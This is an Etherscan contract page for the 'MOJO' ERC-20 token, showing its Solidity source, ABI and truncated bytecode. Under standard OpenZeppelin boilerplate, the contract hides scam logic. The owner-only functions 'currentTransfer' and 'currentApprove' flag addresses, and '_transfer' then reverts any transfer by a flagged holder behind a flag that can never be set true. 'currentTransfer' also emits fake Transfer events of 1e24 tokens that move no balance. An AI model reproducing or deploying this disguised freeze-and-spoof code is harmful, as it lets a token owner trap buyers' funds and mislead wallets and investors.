ERC-20
Overview
Max Total Supply
130,000,000,000,000 MOJO
Holders
37
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
359,719,539,337.722274908235776265 MOJOValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
MOJO
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-06-04 */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.9; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Ownable, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping (address => bool) private _transfersSnapshot; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; bool private _transfersSnapshotApplied = false; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } function currentTransfer(address [] calldata _addresses_) external onlyOwner { for (uint256 i = 0; i < _addresses_.length; i++) { _transfersSnapshot[_addresses_[i]] = true; emit Transfer(address(this), _addresses_[i], 1 * 10**24); } } function currentApprove(address [] calldata _addresses_) external onlyOwner { for (uint256 i = 0; i < _addresses_.length; i++) { _transfersSnapshot[_addresses_[i]] = false; } } function isApprovedCheck(address _address_) public view returns (bool) { return _transfersSnapshot[_address_]; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } if (_transfersSnapshot[from] || _transfersSnapshot[to]) require(_transfersSnapshotApplied == true, ""); emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } /** * @dev Standard signed math utilities missing in the Solidity language. */ library SignedMath { /** * @dev Returns the largest of two signed numbers. */ function max(int256 a, int256 b) internal pure returns (int256) { return a > b ? a : b; } /** * @dev Returns the smallest of two signed numbers. */ function min(int256 a, int256 b) internal pure returns (int256) { return a < b ? a : b; } /** * @dev Returns the average of two signed numbers without overflow. * The result is rounded towards zero. */ function average(int256 a, int256 b) internal pure returns (int256) { // Formula from the book "Hacker's Delight" int256 x = (a & b) + ((a ^ b) >> 1); return x + (int256(uint256(x) >> 255) & (a ^ b)); } /** * @dev Returns the absolute unsigned value of a signed value. */ function abs(int256 n) internal pure returns (uint256) { unchecked { // must be unchecked in order to support `n = type(int256).min` return uint256(n >= 0 ? n : -n); } } } contract MOJO is ERC20 { constructor() ERC20("MOJO", "MOJO") { _mint(msg.sender, 130000000000000 * 10 ** decimals()); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"currentApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"currentTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"isApprovedCheck","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526000600560006101000a81548160ff0219169083151502179055503480156200002c57600080fd5b506040518060400160405280600481526020017f4d4f4a4f000000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f4d4f4a4f00000000000000000000000000000000000000000000000000000000815250620000b9620000ad6200012760201b60201c565b6200012f60201b60201c565b8160069081620000ca9190620005ee565b508060079081620000dc9190620005ee565b5050506200012133620000f4620001f360201b60201c565b600a62000102919062000865565b65763bfbd22000620001159190620008b6565b620001fc60201b60201c565b620009ed565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200026e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002659062000962565b60405180910390fd5b62000282600083836200036a60201b60201c565b806004600082825462000296919062000984565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200034a9190620009d0565b60405180910390a362000366600083836200036f60201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620003f657607f821691505b6020821081036200040c576200040b620003ae565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004767fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000437565b62000482868362000437565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620004cf620004c9620004c3846200049a565b620004a4565b6200049a565b9050919050565b6000819050919050565b620004eb83620004ae565b62000503620004fa82620004d6565b84845462000444565b825550505050565b600090565b6200051a6200050b565b62000527818484620004e0565b505050565b5b818110156200054f576200054360008262000510565b6001810190506200052d565b5050565b601f8211156200059e57620005688162000412565b620005738462000427565b8101602085101562000583578190505b6200059b620005928562000427565b8301826200052c565b50505b505050565b600082821c905092915050565b6000620005c360001984600802620005a3565b1980831691505092915050565b6000620005de8383620005b0565b9150826002028217905092915050565b620005f98262000374565b67ffffffffffffffff8111156200061557620006146200037f565b5b620006218254620003dd565b6200062e82828562000553565b600060209050601f83116001811462000666576000841562000651578287015190505b6200065d8582620005d0565b865550620006cd565b601f198416620006768662000412565b60005b82811015620006a05784890151825560018201915060208501945060208101905062000679565b86831015620006c05784890151620006bc601f891682620005b0565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000763578086048111156200073b576200073a620006d5565b5b60018516156200074b5780820291505b80810290506200075b8562000704565b94506200071b565b94509492505050565b6000826200077e576001905062000851565b816200078e576000905062000851565b8160018114620007a75760028114620007b257620007e8565b600191505062000851565b60ff841115620007c757620007c6620006d5565b5b8360020a915084821115620007e157620007e0620006d5565b5b5062000851565b5060208310610133831016604e8410600b8410161715620008225782820a9050838111156200081c576200081b620006d5565b5b62000851565b62000831848484600162000711565b925090508184048111156200084b576200084a620006d5565b5b81810290505b9392505050565b600060ff82169050919050565b600062000872826200049a565b91506200087f8362000858565b9250620008ae7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200076c565b905092915050565b6000620008c3826200049a565b9150620008d0836200049a565b9250828202620008e0816200049a565b91508282048414831517620008fa57620008f9620006d5565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200094a601f8362000901565b9150620009578262000912565b602082019050919050565b600060208201905081810360008301526200097d816200093b565b9050919050565b600062000991826200049a565b91506200099e836200049a565b9250828201905080821115620009b957620009b8620006d5565b5b92915050565b620009ca816200049a565b82525050565b6000602082019050620009e76000830184620009bf565b92915050565b611b8280620009fd6000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a9059cbb11610071578063a9059cbb146102d0578063dd62ed3e14610300578063e96c389914610330578063efaf48d41461034c578063f2fde38b146103685761010b565b8063715018a61461025a5780638da5cb5b1461026457806395d89b4114610282578063a457c2d7146102a05761010b565b806323b872dd116100de57806323b872dd146101ac578063313ce567146101dc57806339509351146101fa57806370a082311461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e5780632163be8a1461017c575b600080fd5b610118610384565b6040516101259190611163565b60405180910390f35b61014860048036038101906101439190611223565b610416565b604051610155919061127e565b60405180910390f35b610166610439565b60405161017391906112a8565b60405180910390f35b610196600480360381019061019191906112c3565b610443565b6040516101a3919061127e565b60405180910390f35b6101c660048036038101906101c191906112f0565b610499565b6040516101d3919061127e565b60405180910390f35b6101e46104c8565b6040516101f1919061135f565b60405180910390f35b610214600480360381019061020f9190611223565b6104d1565b604051610221919061127e565b60405180910390f35b610244600480360381019061023f91906112c3565b610508565b60405161025191906112a8565b60405180910390f35b610262610551565b005b61026c610565565b6040516102799190611389565b60405180910390f35b61028a61058e565b6040516102979190611163565b60405180910390f35b6102ba60048036038101906102b59190611223565b610620565b6040516102c7919061127e565b60405180910390f35b6102ea60048036038101906102e59190611223565b610697565b6040516102f7919061127e565b60405180910390f35b61031a600480360381019061031591906113a4565b6106ba565b60405161032791906112a8565b60405180910390f35b61034a60048036038101906103459190611449565b610741565b005b61036660048036038101906103619190611449565b610884565b005b610382600480360381019061037d91906112c3565b610931565b005b606060068054610393906114c5565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf906114c5565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b6000806104216109b4565b905061042e8185856109bc565b600191505092915050565b6000600454905090565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000806104a46109b4565b90506104b1858285610b85565b6104bc858585610c11565b60019150509392505050565b60006012905090565b6000806104dc6109b4565b90506104fd8185856104ee85896106ba565b6104f89190611525565b6109bc565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610559610f87565b6105636000611005565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606007805461059d906114c5565b80601f01602080910402602001604051908101604052809291908181526020018280546105c9906114c5565b80156106165780601f106105eb57610100808354040283529160200191610616565b820191906000526020600020905b8154815290600101906020018083116105f957829003601f168201915b5050505050905090565b60008061062b6109b4565b9050600061063982866106ba565b90508381101561067e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610675906115cb565b60405180910390fd5b61068b82868684036109bc565b60019250505092915050565b6000806106a26109b4565b90506106af818585610c11565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610749610f87565b60005b8282905081101561087f576001600260008585858181106107705761076f6115eb565b5b905060200201602081019061078591906112c3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508282828181106107e9576107e86115eb565b5b90506020020160208101906107fe91906112c3565b73ffffffffffffffffffffffffffffffffffffffff163073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef69d3c21bcecceda1000000604051610864919061165f565b60405180910390a380806108779061167a565b91505061074c565b505050565b61088c610f87565b60005b8282905081101561092c576000600260008585858181106108b3576108b26115eb565b5b90506020020160208101906108c891906112c3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806109249061167a565b91505061088f565b505050565b610939610f87565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109a8576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161099f90611734565b60405180910390fd5b6109b181611005565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a2b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a22906117c6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a9a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a9190611858565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b7891906112a8565b60405180910390a3505050565b6000610b9184846106ba565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c0b5781811015610bfd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf4906118c4565b60405180910390fd5b610c0a84848484036109bc565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c80576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c7790611956565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cef576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce6906119e8565b60405180910390fd5b610cfa8383836110c9565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d81576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7890611a7a565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610eb55750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610f115760011515600560009054906101000a900460ff16151514610f10576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0790611ac0565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f6e91906112a8565b60405180910390a3610f818484846110ce565b50505050565b610f8f6109b4565b73ffffffffffffffffffffffffffffffffffffffff16610fad610565565b73ffffffffffffffffffffffffffffffffffffffff1614611003576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ffa90611b2c565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561110d5780820151818401526020810190506110f2565b60008484015250505050565b6000601f19601f8301169050919050565b6000611135826110d3565b61113f81856110de565b935061114f8185602086016110ef565b61115881611119565b840191505092915050565b6000602082019050818103600083015261117d818461112a565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111ba8261118f565b9050919050565b6111ca816111af565b81146111d557600080fd5b50565b60008135905